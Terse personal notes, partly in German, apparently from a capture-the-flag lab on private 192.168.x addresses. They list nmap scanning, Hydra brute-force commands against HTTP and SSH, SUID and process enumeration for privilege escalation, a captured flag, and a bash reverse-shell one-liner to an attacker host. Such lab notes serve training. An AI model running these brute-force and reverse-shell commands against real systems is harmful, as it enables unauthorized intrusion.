nmap 192.168.56.0/24 – mit allen Ports, -T4, damit keine Firewall-Faxen
Python-File für Proof zeigen
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt
https://tylerrockwell.github.io/defeating-basic-auth-with-hydra/
hydra -l user -P pw.txt -s 55487 -f 192.168.15.3 http-get /
FLAG{use_secure_credentials}

ls -R *

hydra -l GrumpyCat -P pw.txt 192.168.15.3 ssh -t 4
find -perm -4000 2> /dev/null
cat /proc/741/cmdline
find -name "ctf_server.py" 2> /dev/null
https://superuser.com/questions/632979/if-i-know-the-pid-number-of-a-process-how-can-i-get-its-name
https://medium.com/techiepedia/series-of-ctf-machines-walkthrough-4-linux-privilege-escalation-enumeration-247899027be
ls -R * 2>/dev/null | grep -i flag
cat /usr/local/bin/flag_process.sh
https://www.exploit-db.com/exploits/42274

https://www.puckiestyle.nl/upgrading-netcat-shells-to-meterpreter-sessions/
bash -i> /dev/tcp/192.168.15.4/6969 0>&1
suid thing

find / -type f -perm -4001 -exec ls -h {} \; 2> /dev/null

  1. credentials
  2. comments
  3. history
  4. tmp
  5. process
  6. sudo
  7. root